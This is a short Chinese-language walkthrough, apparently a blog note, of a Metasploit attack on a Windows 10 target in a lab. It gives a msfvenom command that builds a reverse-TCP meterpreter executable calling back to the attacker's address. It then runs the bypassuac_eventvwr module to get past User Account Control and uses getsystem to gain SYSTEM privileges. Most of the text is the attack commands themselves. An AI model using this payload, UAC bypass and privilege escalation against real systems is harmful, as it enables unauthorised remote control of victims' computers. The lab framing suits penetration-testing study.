在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在使用Metasploit成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。
一、metasploit对windows10入侵测试
攻击机:Kali Linux 2020 IP:192.168.xxx.xxx
靶机:Windows10 IP:192.168.xxx.xxx
1.生成exe文件,在目标主机打开
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.xxx.xxx LPORT=1000 -f exe -o met.exe
2.设置payload,设置本地IP和监听端口
3.运行入侵测试,并获得基础的shell
二、输入background隐藏此界面,然后进一步提权
msf5> use exploit/windows/local/bypassuac_eventvwr
msf5 exploit(bypassuac) > set session 3
msf5 exploit(bypassuac) > exploit
然会生成另一个session,可以进行提权操作了,提权过程中并不需要设置端口号了,默认4444即可
1.输入命令gesystem提取,第一次getuid,显示普通用户权限,第二次是系统权限
2.获得shell之后,敲入dir命令乱码显示,只要输入chcp 65001,解决了问题